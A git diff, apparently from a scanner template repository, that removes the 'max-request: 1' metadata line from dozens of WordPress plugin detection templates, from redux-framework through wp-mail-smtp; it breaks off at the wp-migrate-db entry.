diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 41baa25eb7..dc3d446af3 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index ee389af6ec..96b4699d2d 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
